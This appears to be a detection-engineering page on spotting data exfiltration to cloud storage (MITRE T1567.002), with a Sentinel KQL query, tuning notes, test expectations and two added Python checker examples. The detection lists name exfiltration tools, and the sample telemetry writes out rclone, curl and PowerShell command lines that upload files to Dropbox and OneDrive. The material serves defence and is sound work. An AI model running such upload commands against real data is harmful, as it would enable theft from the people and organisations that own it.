T1567.002 Microsoft Sentinel · KQL

Detect Exfiltration to Cloud Storage in Microsoft Sentinel

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services such as Dropbox, Google Drive, OneDrive, MEGA, and Amazon S3 allow storage and retrieval of data over the Internet. Exfiltration to these services can blend with legitimate enterprise traffic, providing significant cover. Real-world threat actors including Akira, Leviathan, POLONIUM, LuminousMoth, Mustang Panda, and Kimsuky have all leveraged cloud storage for data theft. Rclone is the most commonly observed tool, used by multiple ransomware and espionage groups to automate bulk transfers to attacker-controlled cloud accounts.

MITRE ATT&CK

Tactic: Exfiltration
Technique: T1567 Exfiltration Over Web Service
Sub-technique: T1567.002 Exfiltration to Cloud Storage
Canonical reference: https://attack.mitre.org/techniques/T1567/002/

KQL Detection Query

Microsoft Sentinel (KQL)
let CloudStorageDomains = dynamic([
  "dropbox.com", "dropboxapi.com", "content.dropboxapi.com", "api.dropboxapi.com",
  "drive.google.com", "www.googleapis.com", "storage.googleapis.com", "oauth2.googleapis.com",
  "graph.microsoft.com", "onedrive.live.com", "api.onedrive.com", "files.1drv.com",
  "s3.amazonaws.com", "s3-us-east-1.amazonaws.com",
  "mega.io", "mega.nz", "api.mega.co.nz",
  "api.box.com", "upload.box.com"
]);
let CloudSyncBinaries = dynamic([
  "rclone.exe", "rclone", "azcopy.exe", "azcopy",
  "gsutil", "megaput", "megatools", "megacmd"
]);
// Signal 1: Large outbound transfers to known cloud storage endpoints
let LargeUploads = DeviceNetworkEvents
| where Timestamp > ago(24h)
| where RemoteUrl has_any (CloudStorageDomains)
| where BytesSent > 10485760
| project Timestamp, DeviceName, AccountName, RemoteUrl, RemoteIP, RemotePort,
          BytesSent, InitiatingProcessFileName, InitiatingProcessCommandLine,
          InitiatingProcessParentFileName, Signal = "LargeCloudUpload";
// Signal 2: Rclone or dedicated cloud sync tools executing
let CloudSyncTools = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName has_any (CloudSyncBinaries)
      or ProcessCommandLine has_any (
        "rclone copy", "rclone sync", "rclone move", "rclone mount",
        "azcopy copy", "azcopy sync",
        "gsutil cp", "gsutil rsync",
        "aws s3 cp", "aws s3 sync",
        ":dropbox", ":gdrive", ":onedrive", "mega:", ":s3", ":box"
      )
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine,
          InitiatingProcessParentFileName, Signal = "CloudSyncTool";
// Signal 3: curl/wget/python uploading to cloud storage APIs
let ApiUploads = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("curl.exe", "curl", "wget.exe", "wget",
                       "python.exe", "python3", "python3.exe",
                       "powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any (CloudStorageDomains)
| where ProcessCommandLine has_any (
    "-T ", "--upload-file", "-X PUT", "-X POST", "--data-binary",
    "-d @", "upload", "put_file", "files_upload", "UploadFile",
    "Invoke-RestMethod", "Invoke-WebRequest", "WebClient"
  )
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine,
          InitiatingProcessParentFileName, Signal = "CloudApiUpload";
union LargeUploads, CloudSyncTools, ApiUploads
| sort by Timestamp desc
Severity: High. Confidence: Medium.

Detects exfiltration to cloud storage services via three independent signals, unioned into one result set: (1) large outbound byte transfers (>10 MB) from endpoints to known cloud storage API domains, using DeviceNetworkEvents; (2) execution of dedicated cloud sync tools such as rclone, azcopy, and gsutil with copy/sync subcommands; and (3) curl, wget, or scripting interpreters making HTTP PUT/POST requests directly to cloud storage API endpoints. Covers the threat actor tooling observed in the wild, including Rclone (Akira/Conti), LUNCHMONEY/Dropbox (Leviathan), and direct API uploads (POLONIUM/HEXANE).

Data Sources

  • Network Traffic: Network Connection Creation
  • Process: Process Creation
  • Command: Command Execution
  • Microsoft Defender for Endpoint

Required Tables

  • DeviceNetworkEvents
  • DeviceProcessEvents

False Positives & Tuning

  • OneDrive, Google Drive, and Dropbox desktop sync clients generating large uploads during normal backup or file sync operations
  • DevOps pipelines using rclone, azcopy, or gsutil for legitimate CI/CD artifact uploads to cloud storage
  • Backup software (Veeam, Acronis, BackBlaze) transferring large volumes to cloud-hosted S3-compatible backends
  • Data engineering workflows using gsutil or AWS CLI to transfer datasets between cloud and on-premise environments
  • Security tools performing cloud storage integrity checks or automated threat intelligence feeds pulling from S3/GCS
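
As an added example that is not part of this page (and not Microsoft's or MITRE's code), the following Python models the three signals of the KQL query above, unions them the way the query does, and then applies the allowlist tuning the False Positives list calls for, all over constructed DeviceNetworkEvents / DeviceProcessEvents rows. The allowlisted process names and the svc-cicd account are hypothetical placeholders, and substring matching approximates KQL's term-based has_any.

```python
"""Reference model of the three-signal detection above, plus the allowlist tuning
implied by the False Positives list. Added example for illustration: not the page's
KQL and not Microsoft's or MITRE's code. It runs over constructed rows shaped like
DeviceNetworkEvents / DeviceProcessEvents; substring matching stands in for KQL's
term-based has_any, so matches are slightly broader than the query's."""
from collections import defaultdict

# Domain, binary and marker lists mirror the KQL query.
CLOUD_STORAGE_DOMAINS = (
    "dropbox.com", "dropboxapi.com", "content.dropboxapi.com", "api.dropboxapi.com",
    "drive.google.com", "www.googleapis.com", "storage.googleapis.com", "oauth2.googleapis.com",
    "graph.microsoft.com", "onedrive.live.com", "api.onedrive.com", "files.1drv.com",
    "s3.amazonaws.com", "s3-us-east-1.amazonaws.com", "mega.io", "mega.nz", "api.mega.co.nz",
    "api.box.com", "upload.box.com",
)
CLOUD_SYNC_BINARIES = ("rclone.exe", "rclone", "azcopy.exe", "azcopy",
                       "gsutil", "megaput", "megatools", "megacmd")
SYNC_SUBCOMMANDS = ("rclone copy", "rclone sync", "rclone move", "rclone mount",
                    "azcopy copy", "azcopy sync", "gsutil cp", "gsutil rsync", "aws s3 cp",
                    "aws s3 sync", ":dropbox", ":gdrive", ":onedrive", "mega:", ":s3", ":box")
UPLOADER_BINARIES = ("curl.exe", "curl", "wget.exe", "wget", "python.exe", "python3",
                     "python3.exe", "powershell.exe", "pwsh.exe")
UPLOAD_MARKERS = ("-T ", "--upload-file", "-X PUT", "-X POST", "--data-binary", "-d @",
                  "upload", "put_file", "files_upload", "UploadFile",
                  "Invoke-RestMethod", "Invoke-WebRequest", "WebClient")
LARGE_UPLOAD_BYTES = 10485760  # 10 MiB threshold from the query

# Tuning allowlists: hypothetical values modelled on the False Positives list (vendor sync
# clients, a CI/CD service account). Keep them narrow; allowlist accounts only when scoped.
ALLOWLISTED_PROCESSES = {"onedrive.exe", "googledrivefs.exe", "dropbox.exe"}
ALLOWLISTED_ACCOUNTS = {"svc-cicd"}


def _has_any(text, needles):
    # Case-insensitive substring test standing in for KQL has_any.
    low = text.lower()
    return any(n.lower() in low for n in needles)

def large_uploads(network_events):
    """Signal 1: more than 10 MiB sent to a known cloud storage endpoint."""
    return [dict(e, Signal="LargeCloudUpload") for e in network_events
            if _has_any(e["RemoteUrl"], CLOUD_STORAGE_DOMAINS)
            and e["BytesSent"] > LARGE_UPLOAD_BYTES]

def cloud_sync_tools(process_events):
    """Signal 2: a dedicated sync tool binary, or a sync-style command line."""
    return [dict(e, Signal="CloudSyncTool") for e in process_events
            if _has_any(e["FileName"], CLOUD_SYNC_BINARIES)
            or _has_any(e["ProcessCommandLine"], SYNC_SUBCOMMANDS)]

def api_uploads(process_events):
    """Signal 3: a generic HTTP client or interpreter pushing to a storage API."""
    return [dict(e, Signal="CloudApiUpload") for e in process_events
            if e["FileName"].lower() in UPLOADER_BINARIES
            and _has_any(e["ProcessCommandLine"], CLOUD_STORAGE_DOMAINS)
            and _has_any(e["ProcessCommandLine"], UPLOAD_MARKERS)]

def _allowlisted(hit):
    # A row explained by a known sync client (own or parent process) or a scoped service account.
    procs = {hit.get("FileName", "").lower(), hit.get("InitiatingProcessFileName", "").lower()}
    return bool(procs & ALLOWLISTED_PROCESSES) or hit["AccountName"] in ALLOWLISTED_ACCOUNTS

def detect(network_events, process_events, tuned=True):
    """Union of the three signals, newest first; tuned=True applies the allowlists."""
    hits = (large_uploads(network_events) + cloud_sync_tools(process_events)
            + api_uploads(process_events))
    if tuned:
        hits = [h for h in hits if not _allowlisted(h)]
    return sorted(hits, key=lambda h: h["Timestamp"], reverse=True)

def signals_by_account(hits):
    """Accounts tripping more than one distinct signal are the strongest leads to triage."""
    per_account = defaultdict(set)
    for h in hits:
        per_account[h["AccountName"]].add(h["Signal"])
    return dict(per_account)


# Constructed sample telemetry (not real events).
NETWORK_EVENTS = [
    {"Timestamp": "2024-05-01T08:00:00Z", "DeviceName": "ws01", "AccountName": "alice", "BytesSent": 52428800,
     "RemoteUrl": "https://api.onedrive.com/v1.0/drive/items", "InitiatingProcessFileName": "OneDrive.exe"},
    {"Timestamp": "2024-05-01T09:15:00Z", "DeviceName": "ws07", "AccountName": "bob", "BytesSent": 209715200,
     "RemoteUrl": "https://content.dropboxapi.com/2/files/upload", "InitiatingProcessFileName": "rclone.exe"},
    {"Timestamp": "2024-05-01T09:20:00Z", "DeviceName": "ws03", "AccountName": "carol", "BytesSent": 2097152,
     "RemoteUrl": "https://drive.google.com/drive/my-drive", "InitiatingProcessFileName": "chrome.exe"},
]
PROCESS_EVENTS = [
    {"Timestamp": "2024-05-01T09:14:00Z", "DeviceName": "ws07", "AccountName": "bob", "FileName": "rclone.exe",
     "InitiatingProcessFileName": "cmd.exe", "ProcessCommandLine": 'rclone.exe copy "C:\\Finance" :dropbox:share'},
    {"Timestamp": "2024-05-01T10:00:00Z", "DeviceName": "build01", "AccountName": "svc-cicd", "FileName": "azcopy.exe",
     "InitiatingProcessFileName": "agent.exe", "ProcessCommandLine": "azcopy.exe copy ./dist https://example.blob.core.windows.net/artifacts"},
    {"Timestamp": "2024-05-01T09:30:00Z", "DeviceName": "ws07", "AccountName": "bob", "FileName": "curl.exe",
     "InitiatingProcessFileName": "cmd.exe", "ProcessCommandLine": "curl.exe -X POST https://content.dropboxapi.com/2/files/upload --data-binary @archive.zip"},
    {"Timestamp": "2024-05-01T09:45:00Z", "DeviceName": "ws07", "AccountName": "bob", "FileName": "powershell.exe",
     "InitiatingProcessFileName": "explorer.exe", "ProcessCommandLine": "powershell.exe Invoke-RestMethod -Uri https://graph.microsoft.com/v1.0/me/drive/root:/a.zip:/content -Method PUT -InFile a.zip"},
]
```

On the sample rows, untuned detection returns six hits; the OneDrive client upload and the CI service account's azcopy run are the two the allowlists remove, leaving four hits that all belong to one account. That per-account view is the useful triage pivot: an account that trips a large upload, a sync tool and a raw API upload within the same hour is far stronger evidence than any single signal, which is why the three signals are unioned rather than alerted on in isolation.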

Testing Methodology

Validate this detection against the four Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Rclone Exfiltration to Dropbox (Simulated with Local Filesystem Remote)

    Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy' and the source path. A second Event ID 1 for the 'rclone config create' invocation with 'localtest local' arguments. Security Event ID 4688 if command line auditing is enabled.

  2. Test 2: curl Upload to Cloud Storage API Endpoint

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'content.dropboxapi.com', '-X POST', and '--data-binary'. Sysmon Event ID 3: Network Connection attempted to content.dropboxapi.com:443. The connection will fail due to invalid token but process and network events are generated.

  3. Test 3: PowerShell Upload to OneDrive Graph API

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'graph.microsoft.com', 'Invoke-RestMethod', 'PUT', and 'content'. Sysmon Event ID 3: Network Connection to graph.microsoft.com:443. PowerShell ScriptBlock Log Event ID 4104 with the full upload script.

  4. Test 4: Rclone Configuration File Drop and Cloud Remote Enumeration

    Expected signal: Sysmon Event ID 11: File Create for %APPDATA%\rclone\rclone.conf. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'listremotes' and '--config'. Security Event ID 4688 (if enabled) capturing the rclone invocation. The rclone.conf file creation event is a high-fidelity indicator per the hunting query targeting this artifact.
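
To confirm that the expected telemetry from these four tests actually reaches the log pipeline, here is an added Python check that is not part of this page or of Atomic Red Team. It transcribes the expected signals listed above into predicates and runs them over constructed event records; the file paths, hostnames and user name in the sample events are placeholders, and the optional Security 4688 events are not required by the check.

```python
"""Telemetry check for the four Atomic Red Team tests listed above: given the Sysmon,
Security and PowerShell events collected after a run, confirm that each test's expected
signal actually arrived. Added example, not part of the page or of Atomic Red Team.
Events are constructed here as flat dicts (EventID plus the fields the checks need);
a real run would feed parsed EVTX or Sentinel rows through the same predicates."""


def _has(event, field, *needles):
    # True when every needle appears (case-insensitively) in the named event field.
    value = str(event.get(field, "")).lower()
    return all(n.lower() in value for n in needles)


# Expectations transcribed from the Testing Methodology: every predicate in a test must match
# at least one collected event. Security 4688 is optional on the page, so it is not required.
EXPECTATIONS = {
    1: [("rclone copy", lambda e: e["EventID"] == 1 and _has(e, "Image", "rclone.exe")
                                  and _has(e, "CommandLine", "copy")),
        ("rclone config create", lambda e: e["EventID"] == 1 and _has(e, "Image", "rclone.exe")
                                           and _has(e, "CommandLine", "config create", "localtest local"))],
    2: [("curl POST to Dropbox API", lambda e: e["EventID"] == 1 and _has(e, "Image", "curl.exe")
                                               and _has(e, "CommandLine", "content.dropboxapi.com", "-X POST", "--data-binary")),
        ("network connection", lambda e: e["EventID"] == 3 and e.get("DestinationPort") == 443
                                         and _has(e, "DestinationHostname", "content.dropboxapi.com"))],
    3: [("PowerShell Graph PUT", lambda e: e["EventID"] == 1 and _has(e, "Image", "powershell.exe")
                                           and _has(e, "CommandLine", "graph.microsoft.com", "Invoke-RestMethod", "PUT", "content")),
        ("network connection", lambda e: e["EventID"] == 3 and e.get("DestinationPort") == 443
                                         and _has(e, "DestinationHostname", "graph.microsoft.com")),
        ("script block log", lambda e: e["EventID"] == 4104 and _has(e, "ScriptBlockText", "graph.microsoft.com"))],
    4: [("rclone.conf created", lambda e: e["EventID"] == 11 and _has(e, "TargetFilename", "\\rclone\\rclone.conf")),
        ("rclone listremotes", lambda e: e["EventID"] == 1 and _has(e, "Image", "rclone.exe")
                                         and _has(e, "CommandLine", "listremotes", "--config"))],
}


def check_test(test_id, events):
    """Return {label: matched} for one test; any False is a telemetry or logging gap."""
    return {label: any(pred(e) for e in events) for label, pred in EXPECTATIONS[test_id]}


def missing_signals(events):
    """Per-test list of expected signals that never showed up; an empty list means pass."""
    return {t: [label for label, ok in check_test(t, events).items() if not ok] for t in EXPECTATIONS}


# Constructed events as they might be collected after the four tests (paths and user are
# placeholders). Test 3's 4104 event is deliberately absent, so the check reports that
# script block logging is not enabled on the test host.
COLLECTED_EVENTS = [
    {"EventID": 1, "Image": "C:\\Tools\\rclone.exe",
     "CommandLine": "rclone.exe config create localtest local"},
    {"EventID": 1, "Image": "C:\\Tools\\rclone.exe",
     "CommandLine": "rclone.exe copy C:\\Users\\Public\\sample localtest:C:\\Temp\\out"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -X POST https://content.dropboxapi.com/2/files/upload --data-binary @sample.txt"},
    {"EventID": 3, "DestinationHostname": "content.dropboxapi.com", "DestinationPort": 443},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe Invoke-RestMethod -Uri https://graph.microsoft.com/v1.0/me/drive/root:/sample.txt:/content -Method PUT -InFile sample.txt"},
    {"EventID": 3, "DestinationHostname": "graph.microsoft.com", "DestinationPort": 443},
    {"EventID": 11, "TargetFilename": "C:\\Users\\tester\\AppData\\Roaming\\rclone\\rclone.conf"},
    {"EventID": 1, "Image": "C:\\Tools\\rclone.exe",
     "CommandLine": "rclone.exe listremotes --config C:\\Users\\tester\\AppData\\Roaming\\rclone\\rclone.conf"},
]
```

Run it over the events exported from the Sentinel workspace or the endpoint's Sysmon log after each test. A label that comes back missing is a collection gap (here, 4104 script block logging for Test 3) to fix before trusting the analytic, since a detection that depends on a field the pipeline never receives will stay silent in production.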
